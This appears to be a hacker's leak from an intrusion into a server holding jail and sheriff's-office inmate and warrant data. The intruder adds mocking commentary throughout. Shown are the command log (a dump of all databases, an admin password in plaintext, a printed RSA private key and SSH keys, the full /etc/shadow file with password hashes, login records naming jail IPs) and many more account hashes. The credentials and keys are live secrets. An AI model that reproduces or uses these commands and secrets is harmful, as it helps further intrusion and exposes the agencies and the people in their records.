mosa2010bN:!!:14719:0:99999:7::: mosa2010:$1$rkKGNbTJ$zuSXZpGmBGZmBLblIR..M0:14720:0:99999:7::: faoret:$1$6FeVAWdI$5tdP6hddCUejnapF8SpSr.:14725:0:99999:7::: bcso_tiger:$1$LY1S8HSQ$nmrLU.ZovFp/3SyDPqh/G.:14727:0:99999:7::: stcsd:$1$pDRSTxFh$ZBvOBAFQ7LnFMjUdsa16g.:14728:0:99999:7::: ccsoms:$1$2AcdfJU9$S7c4H4a0ySzzHVv1Xp8vT0:14736:0:99999:7::: kcsoms:$1$9/UGCy/Q$v0YU2N4s6fJA1WRrnO4/y1:14743:0:99999:7::: pcsoks_sync:$1$ZVgfXBYP$8/7JU659Rzy6AFMTsgUDk1:14753:0:99999:7::: mocsd:$1$ruYfFxnn$THY1iwfnln5fIWJEZ.xuI1:14754:0:99999:7::: postfix:!!:14768:::::: bcsoga:$1$um3cyDMU$iyb6m61oqCGNxsBoFTLP2/:14770:0:99999:7::: jonms_sync:$1$ox9q2AUv$Z.PKJVfV6wBqkdE27vbNw/:14771:0:99999:7::: jcsoks_sync:$1$XkeeIlA/$6H68JaLVbeKNw7YGOOkX31:14790:0:99999:7::: cpsola:$1$NwWGtomq$jgAUVRm6VBvGSujRtKwF31:14806:0:99999:7::: cgsomo:$1$eilIGZWl$eLznlmIdX3xApkdWmpsnT.:14810:0:99999:7::: sfsoar:$1$yOE1lcCf$GUu9M1fczt1Ghc764zw/30:14824:0:99999:7::: sfsoar_sync:$1$nxHb55iY$vFvZhr1ruVHu/4U981Jk2.:14826:0:99999:7::: code:$1$iqeHXuMI$4vRAcEszoYdstIN3RMgx60:14837:0:99999:7::: fcsoga:$1$T2d2gmYb$FFMQvYx7VRTFEtMtYzENj1:14841:0:99999:7::: mcsoga:$1$sU6wEv93$dY7TnQIfrf7CNtxrb1BHv0:14852:0:99999:7::: code2:$1$j9vWcrHj$ackLsXxNqZYDlHGs9EfTJ/:14853:0:99999:7::: kcsoil:$1$RktuLOY5$rqG9aojQ7QPev715Sziym0:14855:0:99999:7::: mcsoal:$1$DfHeInc2$tl5Z3EJ5cbpEI7PAi..nR.:14874:0:99999:7::: sgsomo:$1$ofmWWjSo$VdSaYP7i5Mq3TaigZKJmY/:14879:0:99999:7::: gcsoms:$1$GwuFixxs$ar2pJ.ZaG9F/zahcjl0JP0:14879:0:99999:7::: stoms:$1$VRmMMzI7$x1nr.ZMBdSv7VOng/TpX//:14897:0:99999:7::: hcsar_sync:$1$k8HSpdqc$5G8/PJOdzeQN8W2VKJj461:14901:0:99999:7::: alsa:$1$0D1HLRSq$6mKb1LEmHoM/q2HhpXSjq/:14902:0:99999:7::: pcsoar:$1$HxfuMiMY$bAapp8diWD1nSOjkTEqNx/:14917:0:99999:7::: rcsd:$1$9poK4hQN$gzorj3zcz7dpG21M45ai5.:14921:0:99999:7::: tisoms:$1$wXhmWMjs$EARUykep59RVk3KBNLIay/:14924:0:99999:7::: stoms_sync:$1$TEYhWb2S$dYeYk0rb/sqikIaqqovuR/:14945:0:99999:7::: prsoar:$1$ZIuKGFWZ$b9QSyf2DPsYbBm/pNe.WP1:14952:0:99999:7::: mcsd_sync:$1$b1gA3kVg$Rg3yF/yRG.A/YEM4idaXW1:15001:0:99999:7::: jccgms:$1$52kEGL60$J3C2CN/1fq4b.nD1EaNHP1:15009:0:99999:7::: ccsook:$1$amm2tffa$XaIWUbOY47Dr02lvTWEFf/:15056:0:99999:7::: fcsoar:$1$W74MwMzz$QuYSprTouxtkRx/wKgIJL1:15057:0:99999:7::: poalac:$1$q.RuXO6m$C/hJSOR8TUzP5iZvmh3vc1:15085:0:99999:7::: arsa:$1$dY5DsE1V$aGJWYgu9pj.kO0gQ14zpd0:15097:0:99999:7::: rcpica:$1$CXfW/jiM$PrVYk8La/RySYfT0FeMRI/:15100:0:99999:7::: ciga:$1$QTWBjVx9$zs4DkuPeQ7IuyaFtXby3B.:15113:0:99999:7::: sfcgar:$1$GqNHP49J$0idVp0wiWtAcd848aWI5O/:15131:0:99999:7::: lcsomo:$1$ptPfDVG3$nvwb9D.toLPBP1NsCRbNs1:15132:0:99999:7::: tcsoal:$1$0oUtGUJd$dAyePg9xnfh2dNDHRr/s80:15134:0:99999:7::: jwiegand:$1$F.H2Vzt/$BzID0ITAA2LtVZ99e5anu.:15135:0:99999:7::: bcsf:$1$pznU6Acd$jDjShBfJXAE3YUdsF7W140:15135:0:99999:7::: prsoms:$1$NpevRywM$.lnU4tjwBZNx5DyzQ5e8e0:15135:0:99999:7::: acsoms:$1$rRiyYAkw$a9FJbLJJZgcWYgdUX5m/B.:15147:0:99999:7::: kssa:$1$QJmmY.q8$GKzc4XMppwpKPbPVkI/1H1:15149:0:99999:7::: // YOU KNOW WHAT IT IS, ITS A STICKUP # ls -al ~root total 420776 drwxr-x--- 17 root root 4096 Jul 22 11:37 . drwxr-xr-x 26 root root 4096 Feb 22 22:21 .. drwxr-xr-x 2 root root 4096 Nov 30 2010 .autoinstaller -rw------- 1 root root 19127 Jul 21 15:58 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc -rw-r--r-- 1 root root 121 Sep 2 2010 .cshrc -rw-r--r-- 1 root root 9 Feb 10 10:28 .exrc -rw------- 1 root root 686 Jul 20 13:03 .lesshst -rw------- 1 root root 1739 Jul 20 10:29 .mysql_history -rw-r--r-- 1 root root 91 Dec 23 2009 .pearrc -rw------- 1 root root 1024 May 3 09:00 .rnd drwx------ 2 root root 4096 Mar 12 2010 .spamassassin drwx------ 2 root root 4096 Jan 25 13:27 .ssh -rw------- 1 root root 276 Jul 20 10:44 .support_history -rw-r--r-- 1 root root 150 Sep 2 2010 .tcshrc -rw-r--r-- 1 root root 1143587 Jul 22 11:50 BOCS_warrant_query.sql -rw-r--r-- 1 root root 187976 Jul 22 11:45 CRCSD_warrant_query.sql -rw-r--r-- 1 root root 3543 Feb 23 09:42 Chicago drwxrwxrwx 17 20 games 4096 Dec 30 2009 ImageMagick-6.4.8-3 -rw-r--r-- 1 root root 11148165 Apr 9 2009 ImageMagick-6.4.8-3.tar.gz drwxr-xr-x 2 root root 4096 Jul 14 15:15 MASS_PASS -rw-r--r-- 1 root root 94158 Dec 13 2010 MCSOAL.search -rw-r--r-- 1 root root 1501473 Jul 22 11:48 SFSOAR_warrant_query.sql -rw------- 1 root root 742 Feb 4 2008 anaconda-ks.cfg drwxr-xr-x 2 root root 4096 Jun 21 15:31 bin drwxr-xr-x 2 root root 4096 May 3 09:53 cert -rw-r--r-- 1 root root 1898 May 3 09:09 csr.txt drwxr-xr-x 3 root root 4096 Sep 20 2010 downloads -rw-r--r-- 1 bocg psacln 0 Jun 21 14:23 huh -rw-r--r-- 1 root root 1177 Mar 24 08:50 injection_patch.php -rw-r--r-- 1 root root 1182 Mar 24 08:50 injection_patch.php.bak -rw-r--r-- 1 root root 13552 Feb 4 2008 install.log -rw-r--r-- 1 root root 2540 Feb 4 2008 install.log.syslog -rwxrwxrwx 1 mosa psacln 803 Mar 24 2010 log.php -rw------- 1 root root 1733 Nov 30 2010 mbox -rw-r--r-- 1 root root 93 Aug 23 2010 md5look.php -rw-r--r-- 1 root root 36773929 Jul 21 22:04 mysql_backup.sql.gz -rw-r--r-- 1 root root 133498898 Jul 1 08:17 mysql_dump_20110701-081158.sql.gz -rw-r--r-- 1 root root 144511936 Jul 8 10:59 mysql_dump_20110708-104506.sql.gz -rw-r--r-- 1 root root 37564532 Jul 15 06:04 mysql_dump_20110715-060000.sql.gz -rw-r--r-- 1 root root 38461089 Jul 22 11:18 mysql_dump_20110722-111716.sql.gz drwxr-xr-x 2 root root 4096 Jun 20 09:46 p7zip -rwxrwxrwx 1 mosa psacln 475 Mar 24 2010 parse_geocodes.php -rw-r--r-- 1 root root 7164 Jul 5 14:20 perms.log drwxr-xr-x 14 1002 1002 4096 Aug 23 2006 php-5.1.6 -rw-r--r-- 1 root root 8187896 Aug 23 2006 php-5.1.6.tar.gz -rw-r--r-- 1 root root 21 Apr 22 10:16 phpinfo.php drwxr-xr-x 9 root root 4096 Jul 21 16:24 psa drwxrwxr-x 2 510 510 4096 Jun 3 2010 qmhandle-1.3.2 -rw-r--r-- 1 webdept webdept 15423 Apr 12 2010 qmhandle-1.3.2.tar.gz -rw-r--r-- 1 root root 4293 Jun 21 17:48 recaptcha.log -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php.bak -rw-r--r-- 1 root root 9747 Jun 21 15:56 recaptchalib.php.bak.bak drwxr-xr-x 3 root root 4096 Dec 21 2009 rootkit_checks drwxr-xr-x 2 root root 4096 Jul 20 11:01 scripts -rw-r--r-- 1 root root 32 Jun 21 14:54 sete.sh -rw-r--r-- 1 root root 355812 Jun 21 14:22 tat E drwxr-xr-x 6 root root 4096 Jun 21 15:38 tiny_mce -rw-r--r-- 1 root root 2231 Jun 21 11:02 tiny_mce.php -rw-r--r-- 1 root root 8957 Jun 21 14:50 tinymce.log -rw-r--r-- 1 root root 6101 Jun 21 15:10 tinymce_php.log -rw-r--r-- 1 root root 1141875 Jun 29 18:20 warrant_query.sql -rw-r--r-- 1 root root 15503360 Jul 22 01:32 z // FIRST LETS LOOT THIS MOFO # mysqldump -q -u admin -p8w667nHzx%XFXb --all-databases --add-drop-table > booty.sql // GIMME THE KEYS TO YO HOUSE # cat ~root/.ssh/* ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA68pUVD3lTeQE5yDAWFOprdg05lmD0eaRznMwDgrAiZhhTEH/ D0crQDXJN5avBKIf1WdKBIi/AL7jlw4++CAdidYt1ZQ4VEQy3NVyVHqXmI/ FtE2sCjUlE8ID2u5Mm5X8Xf57ifkXlrSF6HgLwa8P4KxP3HqrZNgb93hRwP/ VPLkNA7Ef6pkjCMpcOtE0qYynDLswAQhW9abqhiCeWaHHPPTRwjlk0r/vHPwBns777pj5UgU3RkUG9/ 1X70tKdZJR5Mp961WDGy3sC7Qi0hiM/ A3tRdo2NKpiZje0oRX3x8WH69vO9ZITeYcxcfu0o9AwiIVHzxJ/DmzFGbRtZ3W/Hw== root@ip-72-167-49-108.ip.secureserver.net ssh-dss AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/ MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+ dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/ hJgPJWi8XjSj7AAAAFQD9MwyYL/ DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/ AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/ 7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q// ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 root@ip-72-167-49-122.ip.secureserver.net -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/eRBcO8CrAtYk8akXpG7 ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+GeA5bFnOpf1ZD7 gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/PCxo4tUuxeaOBJaWd 2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+xB5QCsk84cFchImi8oZyPwK 6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+6yLxhxSeHUy MGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQIBIwKCAQEAn4NLO0U232hCERCr Wn8z1TeqNkTTG4Kcn2bzld2D6Cg/DIdgps15Lx6IyhZMAjI+yAmG0F/stlFDVBtx FdOM3aBr7vsUMxyE81SKPXzs4Rn3olOOkRQ8qwTuDijP87gZZhV89Mm7vPFCXNQV OR5o2XowoIPNHSY91f/IljdnKkQ05862XywXDqKA4ZURgs2WhCSCGU+bMQ/HcrXx whUi5tWgAH9JTd8cVHbTFNHS9nyf3rsqoKsPjUJZot+RpvBzUk75VsKxEm/NpPUz foMVR/H0vHl1Y5rv6P0fLzBPUBPBSqM94ELa3niBgsOJsdmzWGUnuZjoYX2Q5RCD qa5NHwKBgQDscK4JiSdSh7egaKrFqpDECVR3PtE0gsluxT0am6UmrelZIlILmfFf a3J3QHnGzSPuIJit1Px1su5Jt6qwc2R98DRmGgb2n8BHdNQTU1bpmD4K9iwMD8fx 5bPNLcC69xKD9TSDS6FaHQRHdLnpwuho3m5mlbGISlVOCtU8/yTnUwKBgQDQcQ/B CuHlfB86NIwTTIvTjYUBotk0NqMgHHyLeoZ+mz4kZWKZl7Dp9gC7lA3ljFZh4jIG VD8hlmLflVSjY7EFDEjB7GQ3wsEMGXqVVd/jsE4TNnizehxhUh/0pp/bBHZg0OWZ Lmak2rJxvt7uI5Bs9g+huy+Q3zi8oz3NW2HJxwKBgQDYLIHc1StEJFAdoYYxEPli xrOgOW7Q7Jro7tjH3sLhiQ/cdyZxAca9pBDiDxBAu46QktS8MHHKsjjy8REWWt+J FiFHaEDhfB2DKPxpcMR9zQWGXWoZqAdDkC9cgZpEih+Olwtwui0fMHjw37/rquMe DTG84KJQuP2JLnnRXk2gSwKBgQDEh9unYggwJJJ4tTOdKuo8fh5R//FdHZJ9XK/x OQJ3Xyv2bjhk7hvVRwgBURRqt4Slbt61gqHsd9mQ+oMAc/AMEuWDpF59t6ASuO/r 40DPXRZp4ubVG1yWRh4hL2OFW/qVzEYxV6Kbbx1GrKZOPsoAVbb3kzt59wmb6l7X kKyoTQKBgEtKR9eP5drKiFtGbanMoe4R01yeoda8GcbHenuW8f4+SIzXS0BRYDMG JccKz/XyIk+uxGS+qRDWUS3KFWz8/PUEpLOAEuCv45GpyUVb6XS7O6dn6uVRwEUr UYo6Q+HxQ0ZvBOxtG/usuR0ykiV60GuTxjxVXE6urOWSaypWOaUc -----END RSA PRIVATE KEY----- ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/ eRBcO8CrAtYk8akXpG7ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+ GeA5bFnOpf1ZD7gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/ PCxo4tUuxeaOBJaWd2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+ xB5QCsk84cFchImi8oZyPwK6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+ 6yLxhxSeHUyMGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQ== root@ip-97-74-115-143.ip.secureserver.net 72.167.49.114 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnNcO5j+ xTWrszbZLZ7pdvvqTumaACzgJNW773NBt8laQEq0HUDfdt3tg5LpaIWQTOBD45jjkyiM2QNJq9CliNfJ BnOajtUI90IN2M3xK78ihiHAsp4jdX6kKcpyQrffQ5i8fDllfQmcD/ 7gndTzo273l8BmhQnvIxOTZwGcQPCnylQ7mxmV/KmRUF5uvo2dAkxSZnmOyDEMZLAAcic/+ 98cBbxpXu4154ZLG8pXAJ3ASzm7oC4KsC0T2eFt6Um3/BVNMydFc9KiVbyBy4mUda8/ icvq90TYue3wXWIGwhIPMafSHst6SVAo1m9KLsCA3y1FbHEwK6YzUVi0ZtNmfRw== 72.167.49.108 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6QYFzjOfwhDhJbKf7tN3CcP2VN5euOPRtuDEtuo8Hm4loFsKsVu/ Z4AAObT4nhksaowpND8vzfGikitgZibICYLlMcx8JjHFKaaqmbVYocVdm8HpHmYAvII3BJkIZJ9hT7IR hp1bc4z/KeUgDVquCR4ak4f4hL9eY0w8Cxc3oM/jYw/bFg+nIBs0dctch3Pw/ 4pREyBPO8p2BReWI7WlcA1i4NdzhoevE+ 2qsvMzVWp7HGCIGOQDKgbBL65m2bJrDOZELrvDcBcdrogIpqLO6kSXOnjjVKdcT7zpQuFPR+7wj6t/ fyMcYPx80XmaDzKbGbNpHSPVsKTJsHqh+NRnqQ== ssh-dss AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/ MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+ dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/ hJgPJWi8XjSj7AAAAFQD9MwyYL/ DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/ AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/ 7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q// ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 root@ip-72-167-49-122.ip.secureserver.net // WHY YES THESE ARE JAIL IPS SYNCING THEIR INMATE ROSTER FILES TO THE WEB # head -n 5 last.txt jonms_sy ftpd8479 173.166.203.165 Sat Jul 23 14:43 - 14:43 (00:00) pcsoks_s ftpd8064 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00) pcsoks_s ftpd8056 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00) pcsoks_s ftpd8054 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00) jonms_sy ftpd3730 173.166.203.165 Sat Jul 23 14:28 - 14:28 (00:00) // JUST FOR FUN... # cat /etc/shadow root:$1$.1QVTig3$JduJkOj4jwaps0mslfpGK0:15184:0:99999:7::: bin:*:13913:0:99999:7::: daemon:*:13913:0:99999:7::: adm:*:13913:0:99999:7::: lp:*:13913:0:99999:7::: sync:*:13913:0:99999:7::: shutdown:*:13913:0:99999:7::: halt:*:13913:0:99999:7::: mail:*:13913:0:99999:7::: news:*:13913:0:99999:7::: uucp:*:13913:0:99999:7::: operator:*:13913:0:99999:7::: games:*:13913:0:99999:7::: gopher:*:13913:0:99999:7::: ftp:*:13913:0:99999:7::: nobody:*:13913:0:99999:7::: rpm:!!:13913:0:99999:7::: dbus:!!:13913:0:99999:7::: mailnull:!!:13913:0:99999:7::: smmsp:!!:13913:0:99999:7::: nscd:!!:13913:0:99999:7::: vcsa:!!:13913:0:99999:7::: rpc:!!:13913:0:99999:7::: rpcuser:!!:13913:0:99999:7::: nfsnobody:!!:13913:0:99999:7::: sshd:!!:13913:0:99999:7::: pcap:!!:13913:0:99999:7::: haldaemon:!!:13913:0:99999:7::: bjmsuper:$1$M63jQMA6$cv.SNTL28NcjmVAaxs2Ej.:15184:0:99999:7::: avahi:!!:15182:::::: avahi-autoipd:!!:15182:::::: named:!!:15182:::::: xfs:!!:15182:::::: apache:!!:15182:::::: distcache:!!:15182:::::: mysql:!!:15182:::::: ntp:!!:15182:::::: psaadm:!!:15182:0:99999:7::: popuser:!!:15182:0:99999:7::: mhandlers-user:!!:15182:0:99999:7::: psaftp:!!:15182:0:99999:7::: sw-cp-server:!!:15182:0:99999:7::: webalizer:!!:15182:::::: postgres:!!:15182:::::: mailman:!!:15182:::::: drweb:!!:15182:::::: postfix:!!:15182:::::: bcsd:$1$xCMvzTCw$la6TitHPqhZJZxGm8htNm0:15184:0:99999:7::: bocs:$1$5MIGny/8$RomAufC87/GVd5jpQqvXd1:15185:0:99999:7::: bcso_tiger:$1$sezwL7Dg$FoEEp5RY.3X.nT.uyA1C8/:15184:0:99999:7::: ciga:$1$/FQWHz0M$yWPMQj14PQvi1fecxIrsO1:15185:0:99999:7::: kcsoms:$1$xAHy/f1k$7xCQaeD8ixjn3xhVwaZyX.:15184:0:99999:7::: mcsd:$1$sEyGh2be$PMm64ZLZ7F35Th.EdFZBO1:15184:0:99999:7::: bjm:$1$Cy5SbB3b$WHQqxFVZ.mo9CAuw3QK2U.:15184:0:99999:7::: demo:$1$yY//AeXg$wNK80Z9Un9tVXIBdSnFVr.:15184:0:99999:7::: dymin:$1$Y3Q/Kl9u$BLGlnjVjes3j0Ef6mZKai.:15184:0:99999:7::: code:$1$djs7zQTz$MLKsBoIpUu9kQsOJCkgMM/:15184:0:99999:7::: bjm2:$1$tW0LeatV$nR94bHILSdmz0Q4N1lpuu1:15184:0:99999:7::: polms:$1$dnP9bxxQ$DpXSyrQ6sAFBlchPa1nEd.:15184:0:99999:7::: dcsd:$1$ifDMxt/3$vu/BPAh/654jVaUy1FwGk.:15184:0:99999:7::: hcsoks:$1$8wW7ldva$S8VCJaXcIVvBY7vfEld2I/:15184:0:99999:7::: acsoms:$1$KhajK9K4$gZD3GQ4hFg3bZnm0vi6AN.:15184:0:99999:7::: bcsd_sync:$1$uFr8iazf$aByYOYgT811Ip.4wRexL2/:15184:0:99999:7::: stoms:$1$lBU2FPZk$HD9JCRmC/zs689ayKbnOO/:15185:0:99999:7::: sgsomo:$1$pf9ArBub$aBn.2ZMWAtTYF85YqEep7/:15185:0:99999:7::: lcsomo:$1$JR2qCyHf$u41XNGVKhFOdTU9y1e.wY/:15185:0:99999:7::: bcsoga:$1$rI93Txxe$2QOjFc33mgEVsYJo89pwf/:15185:0:99999:7::: scsomo:$1$r/8EJ7/Q$jbDryfYFa.AZ1pSWHYrqv.:15185:0:99999:7::: izcg:$1$um.djC2T$HpUPY4cMmw26EUq1GBFnQ.:15185:0:99999:7::: crcsd:$1$PgW3mxOA$WIfi2QX4j5z9HQ/yDadUZ1:15185:0:99999:7::: ncsd:$1$z7qrcv0Q$bLlPk0X3ICll7Jj.SYFko.:15185:0:99999:7::: johms:$1$YtAcr6vB$rMntSo3tbOZEiAbeFv8FU/:15185:0:99999:7::: mcmtn:$1$8Wo2rZXP$y7Ku9Vgu41Ee0mF6zJgv//:15185:0:99999:7::: vbcsd:$1$1GxJKxHV$Qc6XRkLc7SZrf3RrSJ/gd1:15185:0:99999:7::: rcpica:$1$OWMi9c1P$JvVzpKMhV..4iOLQh.iGz0:15185:0:99999:7::: icsd:$1$vYV3gRcq$qorp1ljJnyp/zzx9nnL8d.:15185:0:99999:7::: gcsd:$1$KxQLd2nC$emDotofAdSi8FVxHUa6070:15185:0:99999:7::: lawmo:$1$XS9q5HHW$WEMi7d5BhZfJ5hFF4tEZy/:15185:0:99999:7::: // ROOT LOGGED IN... THEY ARE ON TO US... BUT CAN NEVER STOP US # w; ps -aux 16:00:00 up 3 days, 14:28, 2 users, load average: 0.04, 0.05, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bjmsuper pts/0 mthm-static-67-2 09:42 6:10m 0.02s 0.25s sshd: bjmsuper root pts/1 mthm-static-67-2 Fri11 10:59 0.54s 0.54s -bash USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2160 584 ? Ss Jul27 0:01 init [3] root 2 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/0] root 3 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/0] root 5 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/1] root 6 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/1] root 7 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/1] root 8 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/2] root 9 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/2] root 10 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/2] root 11 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/3] root 12 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/3] root 13 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/3] root 14 0.0 0.0 0 0 ? S< Jul27 0:00 [events/0] root 15 0.0 0.0 0 0 ? S< Jul27 0:00 [events/1] root 16 0.0 0.0 0 0 ? S< Jul27 0:00 [events/2] root 17 0.0 0.0 0 0 ? S< Jul27 0:00 [events/3] root 18 0.0 0.0 0 0 ? S< Jul27 0:00 [khelper] root 19 0.0 0.0 0 0 ? S< Jul27 0:00 [kthread] root 25 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/0] root 26 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/1] root 27 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/2] root 28 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/3] root 29 0.0 0.0 0 0 ? S< Jul27 0:00 [kacpid] root 130 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/0] root 131 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/1] root 132 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/2] root 133 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/3] root 136 0.0 0.0 0 0 ? S< Jul27 0:00 [khubd] root 138 0.0 0.0 0 0 ? S< Jul27 0:00 [kseriod] root 213 0.0 0.0 0 0 ? S Jul27 0:00 [khungtaskd] root 216 0.0 0.0 0 0 ? S< Jul27 0:04 [kswapd0] root 217 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/0] root 218 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/1] root 219 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/2] root 220 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/3] root 375 0.0 0.0 0 0 ? S< Jul27 0:00 [kpsmoused] root 422 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_0] root 428 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/0] root 429 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/1] root 430 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/2] root 431 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/3] root 432 0.0 0.0 0 0 ? S< Jul27 0:00 [ata_aux] root 438 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_1] root 439 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_2] root 460 0.0 0.0 0 0 ? S< Jul27 0:00 [kstriped] root 481 0.0 0.0 0 0 ? S< Jul27 0:22 [kjournald] root 506 0.0 0.0 0 0 ? S< Jul27 0:00 [kauditd] root 539 0.0 0.0 2376 628 ? S< Jul27 0:00 [kmpathd/0] root 1391 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/1] root 1392 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/2] root 1393 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/3] root 1394 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpath_handlerd] root 1423 0.0 0.0 0 0 ? S< Jul27 0:00 [kjournald] root 1687 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/0] root 1688 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/1] root 1689 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/2] root 1690 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/3] root 2146 0.0 0.0 12628 776 ? S< Jul27 0:00 [rpciod/0] root 2259 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/1] root 2260 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/2] root 2261 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/3] rpcuser 2270 0.0 0.0 1964 744 ? Ss Jul27 0:00 rpc.statd root 2302 0.0 0.0 5952 636 ? Ss Jul27 0:00 rpc.idmapd dbus 2330 0.0 0.0 2844 940 ? Ss Jul27 0:00 dbus-daemon --system root 2343 0.0 0.0 2256 768 ? Ss Jul27 0:00 /usr/sbin/hcid root 2349 0.0 0.0 1832 504 ? Ss Jul27 0:00 /usr/sbin/sdpd root 2380 0.0 0.0 0 0 ? S< Jul27 0:00 [krfcommd] root 2424 0.0 0.0 12956 1396 ? Ssl Jul27 0:00 pcscd root 2438 0.0 0.0 1760 524 ? Ss Jul27 0:00 /usr/sbin/acpid root 2462 0.0 0.0 2008 452 ? Ss Jul27 0:00 /usr/bin/hidd --server root 2492 0.0 0.0 27364 1368 ? Ssl Jul27 0:00 automount root 2565 0.0 0.0 10260 2316 ? Ss Jul27 0:00 cupsd root 2582 0.0 0.0 2836 872 ? Ss Jul27 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid root 2687 0.0 0.0 6972 1804 ? Ss Jul27 0:05 /usr/libexec/postfix/master root 2721 0.0 0.0 2000 364 ? Ss Jul27 0:00 gpm -m /dev/input/mice -t exps2 postgres 2969 0.0 0.1 21248 3320 ? S Jul27 0:00 /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data postgres 2971 0.0 0.0 11024 864 ? S 